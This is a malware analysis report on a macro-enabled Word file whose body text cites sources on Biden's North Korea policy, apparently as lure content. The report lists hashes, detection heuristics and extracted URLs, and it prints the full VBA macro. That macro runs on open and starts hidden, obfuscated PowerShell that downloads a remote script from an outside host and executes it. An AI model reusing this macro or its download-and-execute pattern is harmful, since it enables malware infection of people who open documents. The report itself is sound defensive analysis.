Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 9365ce79a51768a3…

MALICIOUS

Office (OOXML)

136.2 KB Created: 2020-11-17 09:07:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-11-23
MD5: 52745cd440eeba79d371ac0d736abee3 SHA-1: c49c44626b15c594608ae006d5e38a1bfcfa896f SHA-256: 9365ce79a51768a398cc22ec701d5f256de827fbefed283c933dea4052d66027
118 Risk Score

Heuristics 6

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set objShell = CreateObject("Shell.Application")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • External hyperlinks (1) low OOXML_EXTERNAL_HYPERLINKS
    Document contains 1 external hyperlink — clickable URLs are stored as external relationships. First target: https://nationalinterest.org/blog/korea-watch/joe-bidens-north-korea-policy-will-put-allies-and-facts-first-167922
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://www.demconvention.com/wp-content/uploads/2020/07/2020-07-21-DRAFT-Democratic-Party-Platform.pdf In document text (OOXML body / shared strings)
    • http://keia.org/sites/default/files/publications/kei_report_092920.pdfIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
    • https://www.foreignaffairs.com/articles/united-states/2020-01-23/why-america-must-lead-againIn document text (OOXML body / shared strings)
    • https://en.yna.co.kr/view/AEN20201009000600325In document text (OOXML body / shared strings)
    • http://edition.cnn.com/TRANSCRIPTS/1907/05/nday.05.htmlIn document text (OOXML body / shared strings)
    • https://www.nytimes.com/interactive/2020/us/politics/joe-biden-foreign-policy.htmlIn document text (OOXML body / shared strings)
    • https://www.cnn.com/2020/10/31/politics/biden-foreign-policy-plans/index.htmlIn document text (OOXML body / shared strings)
    • https://www.nytimes.com/interactive/2020/us/politics/2020-democrats-north-korea-foreign-policy.htmlIn document text (OOXML body / shared strings)
    • https://www.desmoinesregister.com/story/news/elections/presidential/caucus/2020/01/14/democratic-debate-transcript-what-the-candidates-said-quotes/4460789002/In document text (OOXML body / shared strings)
    • https://www.foreign.senate.gov/imo/media/doc/BidenStatement080206a1.pdfIn document text (OOXML body / shared strings)
    • https://www.sandiegouniontribune.com/sdut-us-us-north-korea-061409-2009jun14-story.htmlIn document text (OOXML body / shared strings)
    • https://www.voanews.com/usa/trump-or-biden-n-korea-problem-wont-go-awayIn document text (OOXML body / shared strings)
    • https://thehill.com/homenews/campaign/470715-biden-responds-to-north-korea-i-wear-their-insults-as-a-badge-of-honorIn document text (OOXML body / shared strings)
    • https://in.reuters.com/article/uk-usa-election-biden-northkorea-analysi/biden-on-north-korea-fewer-summits-tighter-sanctions-same-standoff-idINKBN25G2R4In document text (OOXML body / shared strings)
    • https://twitter.com/JoeBiden/status/1271572403563507712In document text (OOXML body / shared strings)
    • https://nationalinterest.org/blog/korea-watch/joe-bidens-north-korea-policy-will-put-allies-and-facts-first-167922Document hyperlink
    • https://www.cfr.org/article/joe-bidenIn document text (OOXML body / shared strings)
    • https://www.cfr.org/article/kamala-harris?utm_content=081120&utm_source=tw&utm_medium=social_owned&utm_campaign=e2020In document text (OOXML body / shared strings)
    • https://twitter.com/GalloVOA/status/1311545861806059521?s=20In document text (OOXML body / shared strings)
    • https://www.heritage.org/testimony/moving-beyond-timid-incrementalism-time-fully-implement-us-laws-north-koreaIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2837 bytes
SHA-256: bea5eb9240d5ee9403efdf86f64bd0aa9e7fdc922139a3659c384a1b7c9dd0fe
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub AutoOpen()
asfwefsadfasfsadf
asfwqfasfsdafas
sdfqefsdafsadfwqefsadf
eifhhdfasfiedf
End Sub

Function asfwefsadfasfsadf()
  Selection.Delete Unit:=wdCharacter, Count:=1
End Function

Function eifhhdfasfiedf()
Set objShell = CreateObject("Shell.Application")
Dim wrewsdfdsfsad As String
Dim uedjfjiefihsif(10) As String
wrewsdfdsfsad = "+e+z+p+e+z+o+e+z+w+e+z+e+e+z+r+e+z+s+e+z+h+e+z+e+e+z+l+e+z+l+e+z+.+e+z+e+e+z+x+e+z+e+e+z+"
wrewsdfdsfsad = Replace(wrewsdfdsfsad, "+e+z+", "")

uedjfjiefihsif(0) = "+e+z+[+e+z+s+e+z+t+e+z+r+e+z+i+e+z+n+e+z+g+e+z+]+e+z+$+e+z+a+e+z+=+e+z+{+e+z+(+e+z+N+e+z+"
uedjfjiefihsif(1) = "+e+z+e+e+z+w+e+z+-+e+z+O+e+z+b+e+z+j+e+z+e+e+z+c+e+z+t +e+z+N+e+z+e+e+z+t+e+z+.+e+z+W+e+z+e+e+z+b+e+z+C+e+z+l+e+z+i+e+z+"
uedjfjiefihsif(2) = "+e+z+e+e+z+n+e+z+t+e+z+)+e+z+.+e+z+D+e+z+o+e+z+y+e+z+e+e+z+k+e+z+s+e+z+l+e+z+e+e+z+i+e+z+s+e+z+l+e+z+i+e+z+n+e+z+g+e+z+"
uedjfjiefihsif(3) = "('h+e+z+t+e+z+t+e+z+p+e+z+:+e+z+/+e+z+/+e+z+p+e+z+e+e+z+l+e+z+e+e+z+b+e+z+r+e+z+a+e+z+.+e+z+a+e+z+t+e+z+w+e+z+e+e+z+b+e+z+p+e+z+a+e+z+g+e+z+e+e+z+s+e+z+.+e+z+c+e+z+o+e+z+m+e+z+/+e+z+b+e+z+r+e+z+/+e+z+ce+e+z+.+e+z+t+e+z+x+e+z+t')"
uedjfjiefihsif(4) = "+e+z+}+e+z+;+e+z+$+e+z+b+e+z+=+e+z+$+e+z+a+e+z+.+e+z+r+e+z+e+e+z+p+e+z+l+e+z+"
uedjfjiefihsif(5) = "+e+z+a+e+z+c+e+z+e+e+z+(+e+z+'+e+z+y+e+z+e+e+z+k+e+z+s+e+z+l+e+z+e+e+z+i+e+z+s+e+z+l+e+z+'+e+z+,+e+z+'+e+z+w+e+z+n+e+z+"
uedjfjiefihsif(6) = "+e+z+l+e+z+o+e+z+a+e+z+d+e+z+S+e+z+t+e+z+r+e+z+'+e+z+)+e+z+;+e+z+$+e+z+c+e+z+=+e+z+i+e+z+e+e+z+x+e+z+ +e+z+$+e+z+b+e+z+;+e+z+i+e+z+e+e+z+x +e+z+$+e+z+c+e+z+"
ueijfjdfijiewjddkfoi = Join(uedjfjiefihsif, "")
    ueijfjdfijiewjddkfoi = Replace(ueijfjdfijiewjddkfoi, "+e+z+", "")
objShell.ShellExecute wrewsdfdsfsad, ueijfjdfijiewjddkfoi, "", "open", 0
End Function

Function asfwqfasfsdafas()
    Selection.WholeStory
    With Selection.Font
        .NameFarEast = ""
        .NameAscii = ""
        .NameOther = ""
        .Name = ""
        .Hidden = False
    End With
End Function

Function sdfqefsdafsadfwqefsadf()
    With Selection.ParagraphFormat
        .LeftIndent = CentimetersToPoints(2)
        .SpaceBeforeAuto = True
        .SpaceAfterAuto = True
    End With
    With Selection.ParagraphFormat
        .RightIndent = CentimetersToPoints(2)
        .SpaceBeforeAuto = True
        .SpaceAfterAuto = True
    End With
    Selection.PageSetup.TopMargin = CentimetersToPoints(2.5)
    Selection.PageSetup.BottomMargin = CentimetersToPoints(2.5)
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 25600 bytes
SHA-256: f2ca5abb4519e5b895d6d9a162ec0e4ff708487ce68eba73f9b1ed8cfbc34902

Open this report in the interactive analyzer, or submit your own file for analysis.